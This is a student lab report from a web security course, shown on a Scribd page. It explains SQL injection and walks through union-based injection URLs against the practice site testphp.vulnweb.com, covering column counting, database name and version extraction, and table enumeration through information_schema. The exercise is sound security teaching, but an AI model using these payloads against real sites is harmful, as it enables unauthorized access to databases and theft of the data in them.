Scribd
Upload
18 views5 pages

WMS Exp3

web and mobile security

Uploaded by

Sarthak Puri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
18 views5 pages

WMS Exp3

web and mobile security

Uploaded by

Sarthak Puri
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 5

Experiment 3

Student Name: Sarthak Puri UID: 20BCS7233


Branch: CSE Section/Group: 705/A
Semester: 5th

Aim- Design a method to simulate the SQL injection

Objective- To test SQL injection.

Software/Hardware Requirements-
• Window 7 and above versions.

Introduction-

What is SQL injection (SQLi)?

• SQL injection (SQLi) is a web security vulnerability that allows an attacker to interfere with
thequeries that an application makes to its database.
• It generally allows an attacker to view data that they are not normally able to retrieve.
• In many cases, an attacker can modify or delete this data, causing persistent changes to the
application's content or behaviour.

What is the impact of a successful SQL injection attack?

- A successful SQL injection attack can result in unauthorized access to sensitive data, such as
passwords, credit card details, or personal user information.
- Many high-profile data breaches in recent years have been the result of SQL injection attacks,
leading to reputational damage and regulatory fines.
OUTPUTS-
Steps/Method/Coding:

• Open given below targeted URL in the browser.


• Open the link- http://testphp.vulnweb.com/
• Go to- http://testphp.vulnweb.com/listproducts.php?cat=1
• You’ll inject the malicious code (cheat code)-
http://testphp.vulnweb.com/listproducts.php?cat=-1’
• Put the random number, cheat code –
http://testphp.vulnweb.com/listproducts.php?cat=-1 order by 11 clause to check
the row (tuple).
• Information gathering-
• To check the database name, Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,database( )—
• To check the database version ,Go to
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select
1,2,3,4,5,6,7,8,9,10,version()—
• Information to be fetch-
• Table name- cat=-1 union select 1,2,3,4,5,6,7,8,9,10,group_concat(table_name)
frominformation_schema.tables where table_schema=database()—
- Open the above link

• Different cheat codes


• Trying to find no. of columns by putting number in link
Learning Outcomes-
• How to do SQL injection
• What different function we can perform on the SQL database

You might also like